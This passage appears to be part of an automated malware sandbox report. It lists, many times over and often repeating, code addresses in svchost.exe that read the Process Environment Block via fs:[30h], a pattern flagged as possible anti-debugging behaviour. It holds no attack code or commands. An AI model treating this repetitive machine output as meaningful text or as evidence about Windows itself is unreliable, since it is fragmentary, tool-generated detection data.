Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]	1_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]	1_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]	1_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]	1_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]	1_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]	1_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]	1_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]	1_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]	1_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]	1_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]	1_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]	1_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]	1_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0366C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]	1_2_036666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]	1_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]	1_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]	1_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]	1_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]	1_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]	1_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]	1_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]	1_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]	1_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]	1_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]	1_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]	1_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]	1_2_036C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]	1_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]	1_2_036325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]	1_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]	1_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]	1_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]	1_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]	1_2_036365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]	1_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]	1_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]	1_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]	1_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]	1_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]	1_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]	1_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]	1_2_03664588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]	1_2_0366E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]	1_2_036BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]	1_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]	1_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]	1_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]	1_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]	1_2_036EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]	1_2_0362645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]	1_2_0365245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]	1_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]	1_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]	1_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]	1_2_0362C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]	1_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]	1_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]	1_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]	1_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]	1_2_036304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]	1_2_036364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]	1_2_036644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_036BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]	1_2_036EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]	1_2_0362CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]	1_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]	1_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]	1_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]	1_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]	1_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]	1_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]	1_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]	1_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]	1_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]	1_2_036D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]	1_2_03628B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]	1_2_036DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]	1_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]	1_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]	1_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]	1_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]	1_2_03704B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]	1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]	1_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]	1_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]	1_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]	1_2_0365EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_036BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]	1_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]	1_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]	1_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]	1_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]	1_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]	1_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_036DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]	1_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]	1_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]	1_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]	1_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]	1_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]	1_2_036DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]	1_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]	1_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]	1_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]	1_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]	1_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]	1_2_0366CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]	1_2_0365EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]	1_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]	1_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]	1_2_036BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]	1_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]	1_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]	1_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]	1_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]	1_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]	1_2_03630AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]	1_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]	1_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]	1_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]	1_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]	1_2_03686AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]	1_2_03704A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]	1_2_03668A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]	1_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]	1_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]	1_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]	1_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]	1_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]	1_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]	1_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]	1_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]	1_2_036BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]	1_2_036B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]	1_2_03704940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]	1_2_036B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]	1_2_036C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]	1_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]	1_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]	1_2_036BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]	1_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]	1_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_036BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]	1_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]	1_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]	1_2_036C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0363A9D0
